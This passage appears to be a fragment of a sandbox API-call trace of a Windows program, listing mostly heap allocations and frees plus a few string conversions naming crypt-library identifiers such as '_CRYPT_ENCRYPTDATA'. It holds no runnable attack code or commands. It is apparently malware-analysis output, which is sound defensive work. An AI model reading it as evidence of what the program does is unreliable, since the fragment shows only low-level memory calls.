hHeap=0x8a0000) returned 1 [0184.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0184.773] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.773] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0184.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10b3f) returned 0xbea018 [0184.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2628 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0184.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2688 [0184.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0184.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0184.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0184.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0184.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0184.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0184.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0184.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10b3f) returned 0xa5f008 [0184.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0184.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0184.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0184.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0184.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0184.777] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0184.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0184.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0184.777] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0184.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0184.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.778] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0184.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0184.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26f8 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0184.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.778] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0184.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0184.779] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0184.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0184.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0184.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0184.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0184.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0184.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0184.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.780] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0184.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0184.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0184.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0184.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0184.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0184.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0184.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0184.781] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0184.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0184.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0184.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0184.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0184.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0184.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0184.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.782] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0184.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0184.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0184.782] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0184.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0184.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0184.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0184.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0184.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0184.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0184.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0184.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0184.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0184.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0184.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0184.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0184.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0184.785] 